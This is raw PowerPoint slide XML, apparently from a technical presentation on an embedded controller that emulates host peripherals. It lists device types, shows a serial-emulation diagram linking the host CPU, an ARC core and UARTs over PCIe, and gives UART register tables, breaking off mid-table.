            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1026" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1373708504"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="304800" y="609600"/>
          <a:ext cx="8353425" cy="5789613"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s31758" name="Visio" r:id="rId4" imgW="9184856" imgH="6369961" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId4" imgW="9184856" imgH="6369961" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr>
                        <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                      </p:cNvPicPr>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId5"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr bwMode="auto">
                      <a:xfrm>
                        <a:off x="304800" y="609600"/>
                        <a:ext cx="8353425" cy="5789613"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="244783595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Peripheral Devices</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8229600" cy="4495800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Host I/O devices:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Host communication device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IDE controller emulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Serial port emulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“External” I/O</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>LAN – shared with host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>WLAN – shared with host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bus controllers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SPI controller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SMBus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> controller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Internal” devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Power management devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cryptography offload engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>General-purpose DMA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Timer + Real-time-clock</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="271540054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Serial Emulation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7171"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9718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553200" y="2971800"/>
            <a:ext cx="1219200" cy="338138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host CPU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3276600"/>
            <a:ext cx="1219200" cy="338138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ARC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3257550" y="3067050"/>
            <a:ext cx="1447800" cy="9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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Serial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Emulation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Device</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="2362200"/>
            <a:ext cx="381000" cy="2286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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UART</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="2362200"/>
            <a:ext cx="381000" cy="2286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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Reverse UART”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="3276600"/>
            <a:ext cx="12954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09800" y="3351212"/>
            <a:ext cx="9144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05400" y="2895600"/>
            <a:ext cx="1066800" cy="307975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PCIe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362200" y="2971800"/>
            <a:ext cx="1066800" cy="307975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>AUX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rounded Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="1485901" y="3848100"/>
            <a:ext cx="381000" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Connector 15"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="15" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="3989882"/>
            <a:ext cx="1" cy="8107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03680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4800" y="1752600"/>
          <a:ext cx="2667000" cy="3586208"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="254000"/>
                <a:gridCol w="2413000"/>
              </a:tblGrid>
              <a:tr h="368267">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45716" marB="45716"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>Access</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45716" marB="45716"/>
                </a:tc>
              </a:tr>
              <a:tr h="640023">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>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RBR (RO),</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> THR (WO), DLL (RW)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45716" marB="45716"/>
                </a:tc>
              </a:tr>
              <a:tr h="368267">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45716" marB="45716"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>IER (RW), DLM (RW)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45716" marB="45716"/>
                </a:tc>
              </a:tr>
              <a:tr h="368267">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45716" marB="45716"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>IIR (RO), FCR (WO)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45716" marB="45716"/>
                </a:tc>
              </a:tr>
              <a:tr h="368267">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45716" marB="45716"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>LCR (RW)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45716" marB="45716"/>
                </a:tc>
              </a:tr>
              <a:tr h="368267">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>4</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45716" marB="45716"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>MCR (RW)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45716" marB="45716"/>
                </a:tc>
              </a:tr>
              <a:tr h="368267">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45716" marB="45716"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>LSR (RO)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45716" marB="45716"/>
                </a:tc>
              </a:tr>
              <a:tr h="368267">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>6</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45716" marB="45716"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>MSR (RO)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45716" marB="45716"/>
                </a:tc>
              </a:tr>
              <a:tr h="368267">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>7</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45716" marB="45716"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>SCR (RW)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45716" marB="45716"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Table 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3657600" y="1219200"/>
          <a:ext cx="2667000" cy="5426074"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="533400"/>
                <a:gridCol w="2133600"/>
              </a:tblGrid>
              <a:tr h="365803">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>Access</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
              </a:tr>
              <a:tr h="368343">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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RBR (RW)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
              </a:tr>
              <a:tr h="640155">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>THR (RO) + Write Indication (RO/CR)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
              </a:tr>
              <a:tr h="368343">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>DLL (RW)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
              </a:tr>
              <a:tr h="368343">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>IER (RO)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
              </a:tr>
              <a:tr h="368343">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>4</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>DLM (RW)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
              </a:tr>
              <a:tr h="368343">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>IIR</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (RO)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
              </a:tr>
              <a:tr h="368343">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>6</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>FCR (RO)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725"/>
                </a:tc>
              </a:tr>
              <a:tr h="368343">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
                        <a:t>7</a:t>
                      </a:r>
